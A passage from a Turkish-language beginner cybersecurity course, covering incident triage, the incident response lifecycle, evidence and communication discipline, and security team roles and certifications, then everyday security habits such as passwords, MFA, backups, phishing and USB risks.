Triage, bir alarm geldiğinde veya şüpheli durum görüldüğünde hızlı ön değerlendirme yapmaktır.

4.1 Triage Soruları (Çekirdek Çerçeve)

• Bu sinyal nereden geldi? (hangi sistem, hangi kullanıcı, hangi IP?)

• Bu sinyal ne tür? (event mi, alert mi?)

• Etki var mı? (CIA açısından gizlilik/bütünlük/erişilebilirlik)

• Olay devam ediyor mu? (aktif mi, geçmiş mi?)

• Hızlı sınırlama gerekiyor mu? (hesap kilitleme, erişim kesme, izolasyon)

Basit örnek:
“example.com üzerinde 198.51.100.10 IP’sinden aynı kullanıcıya 20 başarısız giriş”

• Kaynak: kimlik doğrulama logu

• Etki: henüz gizlilik ihlali yok; risk artıyor

• Aksiyon fikri: kullanıcı doğrulama, MFA kontrolü, geçici kilit/şifre sıfırlama

İpucu Kutusu — Önce doğrula, sonra büyüt
Bir alarmla tüm sistemi kapatmak bazen gereksiz iş kesintisi yaratır. Triage, “kontrollü hız” disiplinidir.

4.2 “Normal” Davranışın Baz Çizgisi (Baseline)

Sistem ve kullanıcıların normalde nasıl davrandığına dair referans resimdir. “Anomali” diyebilmek için “normal”i bilmek gerekir. Örneğin Normalde günde 2 kez giriş yapan hesabın bir anda 200 giriş denemesi görmesi.. Günlük hayatta SOC operasyonları, performans izleme, güvenlik izleme.

5) Olay Müdahale Yaşam Döngüsü: Adım Adım

Bu bölüm, klasik olay müdahale yaklaşımını başlangıç seviyesinde uygular.

5.1 Hazırlık (Preparation)

Olay olmadan önce süreç, rol, araç ve iletişim planı oluşturma. Olay anında plan yoksa kararlar panikle alınır. Örneğin “Kim aranacak? Hangi loglar toplanacak? Hangi sistemler kritik?” listesi.. Günlük hayatta Kurumsal IR planları, runbook’lar, vardiya süreçleri.

5.2 Tespit ve Doğrulama (Detection & Validation)

Tespit ve doğrulama, sinyali yakalamak ve gerçek olay olup olmadığını belirlemektir. False positive zaman kaybettirir; false negative ise zararı büyütür. EDR alarmı verdiğinde gerçekten zararlı mı, karantina uygulanmış mı kontrol etmek tipik bir örnektir. EDR alarmları, firewall alarmları ve SIEM uyarıları günlük hayatta sık karşılaşılan durumlardır.

5.3 Sınırlama (Containment)

Sınırlama, olayın yayılmasını ve etkisini durdurmak için geçici veya kalıcı önlemler almaktır. Etkiyi hızla düşürür (Modül 1 risk mantığı ile bağlantılı). Şüpheli hesabı geçici kilitlemek, erişim anahtarını döndürmek veya problemli cihazı ağdan izole etmek tipik örneklerdir. Ağ ayrıştırma (Modül 5) ve hesap güvenliği politikaları (Modül 3) günlük hayatta sık karşılaşılan uygulamalardır.

Dikkat Kutusu — Sınırlama yaparken kanıtı bozmamaya dikkat
Modül 6’daki etik/hukuk çerçevesi burada devreye girer: log silmek yerine korumak, rastgele format atmamak, doğrulanmamış bilgi yaymamak.

5.4 Giderme (Eradication)

Giderme, kök nedeni ortadan kaldırmaktır: zafiyet kapatma, zararlı bileşeni temizleme, yanlış yapılandırmayı düzeltme. Sadece sınırlayıp bırakmak sorunu geri getirir. Zayıf parola politikasını düzeltmek veya gereksiz açık servisi kapatmak (Modül 5'teki "açık servis" mantığıyla bağlantılı) tipik örneklerdir. Patch yönetimi (Modül 4) ve yetkilendirme düzenlemeleri (Modül 3) günlük hayatta sık karşılaşılan uygulamalardır.

5.5 Kurtarma (Recovery)

Sistemleri güvenli şekilde normale döndürme ve izlemeyi artırma. “Acele geri açma” tekrar saldırıya zemin hazırlayabilir. Örneğin Temizlenen sistemi kontrollü olarak ağa geri almak, loglamayı geçici süre sıklaştırmak.. Günlük hayatta Hizmet sürekliliği, yedekleme geri dönüşleri.

5.6 Ders Çıkarma (Lessons Learned)

Olay sonrası rapor ve iyileştirme aksiyonları üretme. Aynı olayın tekrarını önler; güvenlik olgunluğunu artırır. Örneğin “Hangi kontrol eksikti? Hangi eğitim gerekli? Hangi alarm kuralı güncellenmeli?”. Günlük hayatta Post-incident review toplantıları, politika güncellemeleri, kontrol listeleri.

6) Kanıtı Koruma, Kayıt Tutma ve İletişim Disiplini

6.1 Kanıt (Evidence)

Kanıt, olayı anlamaya ve gerekirse ispat etmeye yarayan kayıtlardır: loglar, ekran görüntüleri, konfigürasyon çıktıları, zaman çizelgesi notları. Yanlış müdahale hem analiz hem de hukuki ve etik süreç açısından geri dönülemez kayıp yaratabilir (Modül 6 ile bağlantılı). "Şüpheli giriş saatleri, kaynak IP, etkilenen kullanıcılar" özetinin kanıt referanslarıyla tutulması tipik bir örnektir. Adli bilişim süreçleri, denetimler ve uyumluluk incelemeleri günlük hayatta sık karşılaşılan durumlardır.

6.2 Kayıt Tutma (Incident Journal) Nasıl Olmalı?

• Zaman çizelgesi: “İlk ne zaman fark edildi, kim fark etti?”

• Gözlem: “Hangi belirti görüldü?”

• Aksiyon: “Hangi adım atıldı, kim attı?”

• Sonuç: “Ne değişti, etki azaldı mı?”

• Kanıt referansı: “Hangi log, hangi ekran görüntüsü, hangi kayıt?”

İpucu Kutusu — Kayıt, hafızadan daha güvenilirdir
Olaylar stresli anlarda yaşanır. Yazılı kayıt, doğru iletişim ve doğru iyileştirme için şarttır.

6.3 İletişim: Kime, Ne Zaman, Ne Kadar?

İletişim, olay bilgisini "ihtiyaç kadar" paylaşmak ve tek bir doğrulanmış kanaldan yönetmektir. Fazla veya yanlış bilgi panik yaratır; eksik bilgi gecikme yaratır. İç iletişimde teknik detay, etki ve plan; dış iletişimde doğrulanmış ve gerekli minimum bilgi örnekleri sunulabilir. Kriz iletişimi, müşteri bilgilendirme ve KVKK/GDPR bildirim süreçleri (Modül 6 ile bağlantılı) günlük hayatta sık karşılaşılan durumlardır.

7) Kısa Senaryolarla Uygulama (Kavramsal)

Bu senaryolar “nasıl saldırı yapılır” öğretmez; olay yönetimi refleksi kazandırır.

7.1 Şüpheli Oturum Denemeleri

Bir hesapta kısa sürede çok sayıda başarısız giriş ve ardından farklı bir cihazdan başarılı giriş görülüyor.

• Event/alert: Başarısız girişler event; yoğunlaşınca alert oluşabilir.

• Triage: Kullanıcı doğrulama, MFA durumu, giriş zamanı/cihazı kontrolü.

• Sınırlama: Hesabı geçici kilitleme, parola sıfırlama, aktif oturumları kapatma.

• Modül 3’te MFA ve parola hijyeni; Modül 6’da kayıt ve kontrollü iletişim.

7.2 Beklenmeyen Ağ Trafiği Artışı

Bir ofiste misafir ağında trafik artışı ve ana ağda yavaşlama fark ediliyor.

• Triage: Hangi segment etkilendi? (Modül 5: ağ ayrıştırma)

• Sınırlama: Misafir ağını izole etme, ana ağa erişimi kısıtlama, firewall kuralını sıkılaştırma.

• Kayıt: Zaman çizelgesi + etkilenen servisler (CIA: erişilebilirlik).

• Bir sonraki modülde korelasyonla “neden–sonuç” ilişkisi daha net kurulacak.

7.3 Yanlış Paylaşılmış Dosya Bağlantısı Şüphesi

Bir ekip, bir doküman bağlantısının yanlışlıkla herkese açık olabileceğini fark ediyor.

• Sınıflandırma: Breach riski var mı? (Modül 6: veri ihlali mantığı)

• İlk adımlar: Linki kapat, izinleri düzelt, erişim kayıtlarını kontrol et, zaman çizelgesi oluştur.

• İletişim: Yetkili kişilere kontrollü bilgi; gerekirse uyum/bildirim hazırlığı.

8) İş Dünyasında Olay Yönetimi: Takımlar, Roller ve Günlük Sorumluluklar

Bu bölüm, az önce öğrendiğiniz olay yönetimi akışının sektörde hangi rollere karşılık geldiğini gösterir. Bu sayede “öğrendiğim bilgi işte nerede kullanılıyor?” bağlantısı kurarsınız.

8.1 Mavi Takım (Blue Team) — Savunma Odaklı Roller

Kurumun dijital varlıklarını izleyen, tespit eden ve savunma kontrollerini geliştiren ekip/roller. Modül 1’deki CIA üçlüsünü pratikte koruyan taraf çoğunlukla mavi takımdır. Örneğin Gece saatlerinde 192.0.2.15 IP’sinden tekrarlayan başarısız girişleri fark edip triage başlatmak.. Günlük hayatta SOC, EDR yönetimi, SIEM izleme, olay müdahale süreçleri.

SOC Analisti (Security Operations Center Analisti)

• Logları ve alarmları izler, triage yapar, gerekirse olayı büyütür (escalation).

• Bu rolün kalbinde event/alert ayrımı ve baseline mantığı vardır (bu modülün ana konusu).

Olay Müdahale Uzmanı (Incident Responder)

• Doğrulanmış incident’te containment–eradication–recovery adımlarını koordine eder.

• Modül 6’daki etik/hukuk çerçevesiyle uyumlu şekilde kanıt ve kayıt disiplinini sürdürür.

İpucu Kutusu — Mavi takım için en kritik refleks
Hız önemlidir; fakat hız, “rastgele aksiyon” değil prosedürlü hızdır. Triage ve kayıt tutma alışkanlığı sizi profesyonelleştirir.

8.2 Kırmızı Takım (Red Team) — Saldırı Simülasyonu Odaklı Roller

Kırmızı takım, kurumun izniyle saldırgan bakış açısını simüle ederek zafiyetleri bulup raporlayan ekip ve rollerdir. Gerçek saldırgan bulmadan önce zayıflıkları keşfedip kapatmak olay riskini düşürür (Modül 4 hardening, Modül 5 açık servis, Modül 6 yetkilendirme ve kapsam ile bağlantılı). Yeni bir uygulama yayına girmeden önce kimlik doğrulama akışında zayıf noktayı tespit edip raporlamak tipik bir örnektir. Sızma testleri (pentest), red team tatbikatları ve güvenlik değerlendirmeleri günlük hayatta sık karşılaşılan uygulamalardır.

Sızma Testi Uzmanı (Pentester)

• “Teknik olarak yapılabilir” olanı değil, izinli ve kapsam dahilinde olanı yapar (Modül 6).

• Bulduğu bulgular, mavi takımın tespit kurallarını ve savunma kontrollerini geliştirmesine katkı sağlar.

8.3 Mor Takım (Purple Team) — İş Birliği Modeli

Kırmızı ve mavi takımın birlikte çalışarak bilgi paylaşımı yaptığı çalışma modeli. Saldırı simülasyonundan çıkan bulguların, savunma tarafında ölçülebilir iyileştirmeye dönüşmesini hızlandırır. Örneğin Red team’in simüle ettiği bir senaryodan sonra mavi takımın SIEM kuralını güncellemesi ve tekrar test etmesi.. Günlük hayatta Tatbikatlar, tabletop exercise’lar, tespit mühendisliği çalışmaları.

8.4 Yönetişim, Risk ve Uyum (GRC)

GRC (Yönetişim, Risk ve Uyum), güvenliği yönetim, risk ve mevzuat boyutuyla ele alan alan ve rollerdir. Olay yönetimi sadece teknik değildir; bildirim, kayıt ve politika gerektirir (Modül 6 ile bağlantılı). Veri ihlali şüphesinde hangi bilginin nasıl raporlanacağına dair prosedürlerin bulunması tipik bir örnektir. ISO 27001 gibi BGYS süreçleri, iç denetimler ve KVKK/GDPR uyum çalışmaları günlük hayatta sık karşılaşılan uygulamalardır.

Not (Doğruluk kontrolü): ISO/IEC 27001, kurumlarda Bilgi Güvenliği Yönetim Sistemi (BGYS) kurmak ve riskleri yönetmek için kullanılan uluslararası bir standarttır.

9) Kariyer Yol Haritası: Yetkinlikler, Öğrenme Planı ve Sertifikasyon

9.1 Temel Teknik Yetkinlikler

Bu modülde öğrendiğiniz olay yönetimi akışı, aşağıdaki temellerle doğrudan ilişkilidir:

• Ağ temelleri: TCP/IP, DNS, HTTP(S) (Modül 5 ile bağlantılı)

• İşletim sistemleri: Windows/Linux logları, servisler, kullanıcı/izin yapıları (Modül 4 ile bağlantılı)

• Kimlik ve erişim: MFA, oturum yönetimi, hesap güvenliği sinyalleri (Modül 3 ile bağlantılı)

• Betik yazma/otomasyon: Tekrarlayan kontrolleri hızlandırmak için (ör. log filtreleme, raporlama)

Basit örnek: Bir analist, her gün yüzlerce giriş denemesini tek tek incelemek yerine, belirli bir eşik üstünü otomatik raporlayan küçük bir betik yaklaşımıyla zaman kazanır.
Gerçek hayatta nerede görülür: SOC otomasyonu, uyarı zenginleştirme (enrichment), temel raporlama.

9.2 Sosyal Yetkinlikler (Soft Skills)

• Analitik düşünme: Olay zincirini parçalara ayırıp kök nedeni bulma.

• İletişim: Teknik bulguyu iş etkisine çevirebilme (CIA diliyle).

• Etik değerler: Yetkilendirme, kapsam ve gizlilik disiplinine bağlılık (Modül 6 ile bağlantılı).

• Sürekli öğrenme: Tehditler değişir; güncel kalmak mesleğin parçasıdır.

9.3 Sertifikasyonlara Genel Bakış (Başlangıçtan İleriye Konumlandırma)

Sertifikalar “kapıyı açmaya” yardımcı olabilir; ancak tek başına yeterli değildir. Bu nedenle sertifikaları, pratik projeler ve temel kavrayışla birlikte düşünmek gerekir.

• CompTIA Security+ genellikle temel güvenlik kavramlarını ve çekirdek becerileri doğrulayan, giriş seviyesinde yaygın bir sertifikadır.

• Cisco CyberOps Associate / CBROPS odak olarak güvenlik operasyonları ve SOC pratikleriyle ilişkilendirilen bir sertifikasyon hattıdır (loglar, izleme, operasyonel bakış).

• CEH (Certified Ethical Hacker) etik hacking ve sızma testi kavramlarına giriş niteliğinde konumlandırılır.

• OSCP (Offensive Security Certified Professional) uygulamalı/elle yapılan değerlendirme yaklaşımıyla bilinen bir sertifikadır; “hands-on” vurgusu güçlüdür.

Dikkat Kutusu — Sertifika tek başına kariyer garantisi değildir
Sertifikalar bir çerçeve sunar; mülakat ve işte performansı belirleyen, temel mantık + pratik uygulama + iletişim disiplinidir. Bu modüldeki triage ve kayıt tutma refleksi, pratik tarafın “çekirdeği”dir.

9.4 Pratik Gelişim Önerileri (Yeni Başlayan İçin)

• Küçük bir sistemde “event–alert–incident” örnekleri toplayıp sınıflandırma pratiği yapın.

• Baseline çıkarma alıştırması yapın: “normal giriş saatleri”, “normal trafik” gibi.

• Basit bir incident journal şablonu oluşturup senaryolar üzerinde doldurun.

• CTF (Capture The Flag), OSINT, bug bounty gibi etkinlikleri etik ve yetkili çerçevede değerlendirin (Modül 6 ile bağlantılı).

Bir sonraki modülde, bu pratiklerin daha sistematik izleme ve korelasyonla nasıl “ölçeklenebilir” hale getirildiğini göreceksiniz.

Terimler Sözlüğü (Glossary)

Bu Modülde Neler Öğrendik?

• Event, alert, incident ve breach kavramlarını ayırt ederek doğru tepkiyi doğru sınıfa bağlamayı öğrendik.

• Logların temel türlerini ve zaman damgası tutarlılığının analiz için neden kritik olduğunu kavradık.

• Triage yaklaşımıyla ilk dakikalarda sorulacak çekirdek soruları ve önceliklendirmeyi CIA ile ilişkilendirdik.

• Olay müdahale yaşam döngüsünü (hazırlık, tespit, sınırlama, giderme, kurtarma, ders çıkarma) adım adım ele aldık.

• Kanıtı koruma, kayıt tutma ve kontrollü iletişimin (Modül 6’daki etik/hukuk çerçevesiyle) olay yönetiminde vazgeçilmez olduğunu gördük.

• Olay yönetimi pratiklerinin sektörde mavi takım, kırmızı takım, mor takım ve GRC gibi rol/alanlara nasıl karşılık geldiğini öğrendik; kariyer planlamasında teknik ve sosyal yetkinliklerin önemini bağladık.

Modül 8 — Genel Değerlendirme ve Günlük Hayatta Uygulanabilir Siber Güvenlik Farkındalığı

(Dijital hijyen, davranışsal güvenlik alışkanlıkları, hesap–cihaz–ağ güvenliği, veri koruma, sosyal mühendislik dayanıklılığı ve kişisel mini müdahale planı)

Bu modül, önceki yedi modülde edinilen teknik ve teorik bilgileri günlük yaşamda uygulanabilir, sürdürülebilir bir “güvenlik farkındalığı” yaklaşımına dönüştürür. Modül 1’deki risk ve CIA üçlüsü, Modül 2’deki sosyal mühendislik ve tehdit türleri, Modül 3’teki hesap/kimlik güvenliği, Modül 4’teki cihaz ve güncelleme disiplini, Modül 5’teki ağ ve şifreleme temelleri, Modül 6’daki etik–hukuk–uyum çerçevesi ve Modül 7’deki olay yönetimi refleksi; bu modülde kişisel ve küçük ölçekli ortamlara uyarlanmış pratik kontrol listeleri, davranış kuralları ve mini planlarla bir araya getirilir. Amaç, “saldırılar nasıl yapılır?” sorusu yerine “riskimi nasıl azaltırım, nasıl güvenli davranırım, bir şey olursa ne yaparım?” sorularına sistematik yanıt üretebilmektir.

Modül Amaçları

Bu modülü tamamlayan bir öğrenci:

• En sık yapılan siber güvenlik hatalarını tanımlar ve bu hataların CIA (Gizlilik–Bütünlük–Erişilebilirlik) üzerindeki etkilerini açıklar (Modül 1 ile ilişkili).

• Güvensiz dijital davranışlar ile güvenli dijital alışkanlıkları ayırt eder; “dijital hijyen” yaklaşımını rutin haline getirir.

• Hesap güvenliği için uygulanabilir bir plan oluşturur: güçlü ve benzersiz parola, parola yöneticisi yaklaşımı, MFA, kurtarma ayarları (Modül 3 ile ilişkili).

• Cihaz güvenliği hijyenini uygular: güncelleme/patche, uygulama izinleri, şifreleme, ekran kilidi, yedekleme ve kurtarma testi (Modül 4 ve Modül 5 ile ilişkili).

• Sosyal mühendislik ve dolandırıcılık sinyallerini tanır; “dijital şüphecilik ve doğrulama” refleksi geliştirir (Modül 2 ile ilişkili).

• 3-2-1 yedekleme stratejisini ve “off-site yedek” mantığını akademik ve pratik düzeyde açıklar.

• Sıfır Güven (Zero Trust) ve En Az Yetki (Least Privilege) prensiplerini günlük hayata uyarlayarak erişim kararlarını daha güvenli hale getirir.

• Şüpheli bir durumda kişisel “mini olay müdahale planı” uygular: sınırlama–kayıt–doğrulama–kontrollü iletişim (Modül 7 ile ilişkili).

Günlük Hayatta Siber Güvenlik Farkındalığı

1) Güvenlik Farkındalığı: Teknikten Davranışa Geçiş

Siber güvenlik yalnızca “araçlar” veya “IT departmanı” meselesi değildir; büyük ölçüde insan davranışlarının kalitesiyle şekillenen bir farkındalık ve disiplin alanıdır.

1.1 CIA Üçlüsü ile Günlük Karar Verme (Gizlilik–Bütünlük–Erişilebilirlik)

CIA üçlüsü; bilginin gizli kalması, değişmeden doğru kalması ve ihtiyaç duyulduğunda erişilebilir olması hedefidir. Günlük bir hata, bazen “gizlilik” (hesap ele geçirme), bazen “bütünlük” (dosyaların değiştirilmesi), bazen “erişilebilirlik” (dosyalara erişememe) sorununa dönüşür. Örneğin Hesabın ele geçirilmesi gizliliği; dosyaların bozulması bütünlüğü; fidye yazılımı erişilebilirliği etkiler. Günlük hayatta hesap çalınmaları, sahte işlemler, dosya kayıpları, hizmet kesintileri.

Modül 1’deki risk yaklaşımı ve CIA üçlüsü bu modülün omurgasını oluşturur.
Modül 7’deki olay yönetimi refleksi, CIA etkisini hızlı sınıflandırmada kullanılır.

1.2 “Zincir En Zayıf Halkası Kadar Güçlüdür”: İnsan Faktörü

En iyi teknik kontroller bile yanlış davranışla aşılabilir. Saldırılar çoğu zaman “teknik duvarı yıkmak” yerine kullanıcıyı ikna ederek kapıyı açtırmayı hedefler (Modül 2). Örneğin Güçlü sistemler varken bile, bir kişinin OTP kodunu paylaşması hesabın kaybına yol açabilir. Günlük hayatta kimlik avı, sahte destek aramaları, acele ettirme taktikleri.

2) Günlük Hayatta Tehdit Modellemesi: “Neyi, Neden Koruyorum?”

Güvenlik farkındalığı, rastgele önlemler toplamı değil; risk temelli bir yaklaşımdır.

2.1 Tehdit, Zafiyet, Risk ve Etki

Tehdit, zarar verme potansiyeli olan aktör veya olaydır (dolandırıcı, zararlı yazılım, veri sızıntısı). Zafiyet, açıklık veya hatalı uygulamadır (zayıf parola, güncellenmemiş yazılım). Risk, tehdit ve zafiyet birleştiğinde ortaya çıkan olasılık ve etki bileşimidir. Etki, olay olursa kayıp türü ve büyüklüğüdür (para, veri, zaman, itibar). Modül 1'deki "risk = olasılık × etki" mantığı önlem önceliklerini belirler. Aynı parolayı her yerde kullanmak zafiyettir; bir sızıntı tehdittir; etki zincirleme hesap kaybıdır. Parola sızıntıları, kimlik avı mesajları ve uygulama güvenlik açıkları günlük hayatta sık karşılaşılan örneklerdir.

İpucu Kutusu — Önce varlıklarını belirle (assets)
En değerli varlıklarınızı yazın: ana e-posta hesabı, banka uygulaması, bulut depolama, telefon, kişisel fotoğraflar. Önlemleri bu varlıklara göre önceliklendirin.

2.2 Saldırı Yüzeyi ve Dijital Ayak İzi

Saldırı yüzeyi, size ulaşılabilecek tüm giriş noktalarıdır (hesaplar, cihazlar, uygulamalar, ağlar). Dijital ayak izi, internette bıraktığınız izlerdir. Saldırı yüzeyi büyüdükçe zayıf halka ihtimali artar; dijital ayak izi ise hedefli saldırılarda "keşif" için kullanılabilir. Aynı e-posta ile çok sayıda siteye kayıt olmak unutulan eski hesabı riskli hale getirebilir. Eski üyelikler, sosyal medya paylaşımları ve açık profil bilgileri günlük hayatta sık karşılaşılan örneklerdir.

Modül 1’deki “keşif (reconnaissance)” mantığı ve Modül 2’deki OSINT kavramı; dijital ayak iziyle doğrudan ilişkilidir.

3) En Sık Yapılan Güvenlik Hataları ve Neden Tehlikelidir?

Bu bölüm, pratikte en sık görülen “insan kaynaklı” zayıflıkları ve bunların etkisini sistematik olarak ele alır.

3.1 Parola Yorgunluğu ve Tekrar Kullanım

Parola yorgunluğu, çok sayıda hesabı yönetmenin bilişsel yükünün aynı parolanın farklı yerlerde kullanılmasına yol açmasıdır. Modül 3'teki credential stuffing saldırıları sızdırılmış kimlik bilgilerini başka platformlarda otomatik dener. Bir tasarım forumunda kullanılan parola aynı zamanda e-posta hesabında da kullanılıyorsa, forum sızıntısı e-postayı da riske atar. Veri sızıntısı sonrası farklı hizmetlerde ardışık giriş denemeleri günlük hayatta sık karşılaşılan durumlardır.

3.2 Güncelleme İhmali (Update Fatigue) ve Patch Yönetimi

Güncelleme bildirimlerini sürekli ertelemek, bilinen zafiyetlerin açık kalması demektir. Modül 4’te vurgulandığı gibi yamalar (patch) bilinen açıkları kapatır; güncellenmeyen sistemler otomatik istismar araçlarına karşı savunmasız kalır. Örneğin Telefon veya tarayıcı aylarca güncellenmezse, bilinen açıklar uzun süre taşınır. Günlük hayatta büyük ölçekli fidye yazılımı dalgalarında, güncellemesi yapılmamış sistemlerin daha kolay etkilendiği görülmüştür.

Dikkat Kutusu — “Sessiz risk” etkisi
Güncellemeyi ertelemenin zararı genellikle hemen görünmez; ancak olay anında maliyet bir anda büyür (Modül 7’deki “etkiyi sınırlama” ihtiyacıyla bağlantılı).

3.3 Sosyal Medyada Aşırı Paylaşım (Oversharing)

Kişisel/kurumsal bilgilerin kontrolsüz paylaşımı. Aşırı paylaşım, saldırganın “keşif” aşamasında (Modül 1) hedef hakkında değerli bilgi toplamasına yardımcı olur; OSINT (Modül 2) ile birleşince etki artar. Örneğin Ofis masasının fotoğrafında kargo etiketi, ekran kenarındaki not kâğıdı veya kimlik kartı görünmesi. Günlük hayatta sosyal medya paylaşımları, hikâyeler, etkinlik fotoğrafları.

4) Hesap Güvenliği: Kimlik, Parola, MFA ve Kurtarma

Modül 3’teki hesap güvenliği temelleri burada günlük rutine dönüştürülür.

4.1 Güçlü ve Benzersiz Parola Stratejisi + Parola Yöneticisi Yaklaşımı

Güçlü parola; uzun, tahmin edilmesi zor ve her hesap için benzersiz paroladır. Parola yöneticisi yaklaşımı, benzersiz parolaları güvenli biçimde yönetmeyi hedefler. Parola tekrarı zincirleme hesap kaybına yol açar (credential stuffing). Örneğin Kısa ve tahmin edilebilir parolalar yerine uzun ve benzersiz parolalar tercih edilir; kişisel bilgi içermeyen uzun ifadeler daha dirençlidir. Günlük hayatta büyük sızıntılar sonrası hesap ele geçirmeler.

Dikkat Kutusu — Güvenlik soruları ve parola ipuçları
Güvenlik soruları sosyal mühendisliğe açıktır. Gerçek kişisel bilgi yerine, hatırlanabilir ama ifşa riski düşük tutarlı yanıt stratejisi geliştirin.

4.2 Çok Faktörlü Kimlik Doğrulama (MFA) ve Yedek Kodlar

MFA, parolaya ek bir doğrulama katmanı daha kullanmaktır (uygulama kodu, donanım anahtarı vb.). Parola sızsa bile ikinci faktör hesabı koruyabilir. Örneğin e-posta hesabında MFA varsa, saldırgan parolayı bilse bile doğrulama kodu olmadan giriş yapamaz. Günlük hayatta bankacılık, e-posta servisleri, kurumsal hesaplar.

İpucu Kutusu — MFA yedek kurtarma kodları
Telefon kaybı gibi durumlara karşı, MFA yedek kodlarını güvenli bir yerde saklamak hesap kurtarmayı kolaylaştırır.

4.3 Ana E-posta Hijyeni ve Kurtarma Ayarları

Hesap kurtarma; şifre unutma veya saldırı durumunda hesabı geri alma mekanizmalarıdır. Ana e-posta hesabı birçok hizmetin şifre sıfırlama kapısıdır. Örneğin Ana e-posta hesabı için ayrı güçlü parola + MFA + güncel kurtarma seçenekleri (ikinci e-posta/telefon). Günlük hayatta “Şifremi unuttum” süreçleri üzerinden hesap ele geçirme girişimleri.

Modül 3’teki En Az Yetki prensibi, erişim yönetimi ve hesap ayrıcalıklarında temel yaklaşımdır.

5) Cihaz Güvenliği: Güncelleme, İzinler, Şifreleme ve Yedekleme

Modül 4’teki uç nokta güvenliği, burada kontrol listesine dönüşür.

5.1 Patch (Güncelleme) ve Patch Management

Patch, güvenlik açıklarını kapatan güncellemedir. Patch management, güncellemeleri takip edip düzenli uygulama sürecidir. Bilinen açıklar yamalanmadığında otomatik istismar araçları için kolay hedef oluşur. Örneğin Otomatik güncellemeleri kapalı tutmak, aylarca eski sürümde kalmaya yol açabilir. Günlük hayatta tarayıcı/işletim sistemi açıkları, uygulama güvenlik güncellemeleri.

5.2 Uygulama Kaynakları, İzin Yönetimi ve Gereksiz Uygulama Temizliği

Uygulama izinleri, uygulamanın kamera/konum/mikrofon/rehber gibi verilere erişim hakkıdır. Gereksiz izin, gereksiz veri riski demektir (Modül 6’daki veri minimizasyonu ile ilişkilidir). Örneğin Basit bir aracın rehbere erişim istemesi “işlevle ilişkili mi?” sorusunu doğurmalıdır. Günlük hayatta aşırı veri toplayan uygulamalar, reklam izleme ekosistemleri.

5.3 Şifreleme ve Ekran Kilidi

Şifreleme veriyi yetkisiz okumaya karşı korur; ekran kilidi fiziksel erişime karşı temel bariyerdir. Cihaz kaybı/çalınması durumunda gizliliği korur. Örneğin Güçlü ekran kilidi ve şifreleme yoksa cihazı bulan kişi kişisel verilere ulaşabilir. Günlük hayatta kaybolan telefonlar, taşınabilir diskler.

Modül 5’teki kriptografi temelleri, şifrelemenin mantığını kavramayı sağlar.

5.4 3-2-1 Yedekleme Stratejisi ve Kurtarma Testi

3-2-1; verinin 3 kopyası, 2 farklı medya türü ve 1 kopyasının farklı fiziksel konumda (off-site) tutulması yaklaşımıdır. Veri bütünlüğü ve erişilebilirliği için temel savunma hattıdır; fidye yazılımı, arıza, yanlış silme gibi risklerde etkiyi azaltır. Örneğin Bulutta bir kopya + harici diskte bir kopya + bu kopyalardan birinin farklı konumda saklanması. Günlük hayatta cihaz arızaları, dosya kayıpları, fidye yazılımı sonrası geri dönüş.

Dikkat Kutusu — Yedek almak yetmez, geri yükleme test edilir
Yedeğin gerçekten işe yarayıp yaramadığını periyodik geri yükleme testiyle doğrulayın.

6) Güvenli İnternet Kullanımı: Ağ Ortamı, VPN, HTTPS ve Doğrulama

Modül 5’teki ağ temelleri bu bölümün arka plan bilgisidir.

6.1 Halka Açık Wi-Fi ve MITM (Aradaki Adam) Riski

Halka açık Wi-Fi ağları, trafiğin izlenmesi veya yönlendirilmesi gibi risklere daha açıktır. MITM, iki taraf arasındaki iletişimin gizlice izlenmesi/değiştirilmesidir. Ortam riski yükseldiğinde, aynı hata daha büyük etki doğurabilir. Örneğin “FreeCafeWiFi” gibi bir ağın gerçekten kime ait olduğunu bilemeyebilirsiniz; hassas işlemleri ertelemek daha güvenlidir. Günlük hayatta Kafe/otel/havaalanı ağları.

Güvenli alternatif yaklaşımı: Zorunluysa hücresel veri tercih etmek; gerekiyorsa güvenli tünelleme yaklaşımı (ör. VPN) kullanmak.
Modül 5’teki VPN ve ağ protokolleri; burada “ortam riskini” anlamlandırır.

6.2 HTTPS, Sertifika Uyarıları ve “Kilit Her Şeyi Kanıtlamaz”

HTTPS, tarayıcı–site arasındaki trafiği şifreler; sertifika uyarısı güven ilişkisinin kurulamadığını gösterebilir. Şifreli trafik, her zaman “güvenilir niyet” anlamına gelmez; sahte siteler de HTTPS kullanabilir. Örneğin Kilit simgesi iletişimin şifreli olduğunu gösterebilir; ancak alan adını ve içeriği doğrulamak gerekir. Günlük hayatta sahte giriş sayfaları, benzer görünen alan adları.

İpucu Kutusu — Alan adı ve gönderen kontrolü
Örneğin bir e-postada “destek@example.com” beklerken “destek@example-net.org” gibi benzer görünen adresler şüphe doğurmalıdır. Doğrulama için linke tıklamak yerine ilgili hizmete tarayıcıdan kendiniz gidin.

7) Sosyal Mühendislik ve Dolandırıcılıklara Karşı Dayanıklılık

Modül 2’deki sosyal mühendislik burada günlük hayata uyarlanır.

7.1 Phishing: Mesaj Sinyalleri ve 3 Adımlı Kontrol

Phishing; sahte mesajlarla kullanıcıyı bağlantıya tıklamaya, bilgi vermeye veya işlem yapmaya ikna etme girişimidir. Birçok saldırı, kullanıcının kendi eliyle kimlik bilgisi vermesiyle başlar. Örneğin “Hesabınız askıya alındı, hemen doğrulayın” mesajı; sahte giriş sayfasına yönlendirebilir. Günlük hayatta e-posta, SMS, mesajlaşma uygulamaları, sosyal medya.

İpucu Kutusu — 3 adımlı kontrol

1. Ton: acele/korku/ödül var mı?

2. İşlem: parola/OTP/para transferi gibi kritik mi?

3. Doğrulama: bağımsız kanaldan kontrol edilebilir mi?

7.2 Vishing/Smishing ve OTP Paylaşmama Kuralı

Vishing telefonla, smishing SMS ile dolandırıcılıktır. Resmiyet hissi hızlı iknaya yol açabilir. Örneğin “Hesabınızda şüpheli işlem var” denilerek OTP istenmesi. Günlük hayatta sahte destek aramaları, banka/kurum taklidi.

Dikkat Kutusu — OTP/MFA kodu paylaşılmaz
OTP/MFA kodu kimliğin son anahtarı olabilir; kural olarak kimseyle paylaşılmaz.

8) Çıkarılabilir Medya ve Fiziksel Güvenlik: Gözden Kaçan Riskler

Bu başlık, “sadece dijital” sanılan güvenlik algısının ötesine geçer.

8.1 Bilinçsiz USB/Güç Bankası Kullanımı

Bulunan veya kaynağı belirsiz çıkarılabilir medya, zararlı yazılım taşıyabilir. Merak ve hız, teknik önlemleri baypas eder; zararlı içerik (payload) çalıştırılabilir. Örneğin Otoparkta bulunan USB’nin bilgisayara takılması; zararlının ağa yayılmasına yol açabilir. Günlük hayatta kurumlarda “bırakılmış USB” senaryoları, tedarik zinciri riskleri.

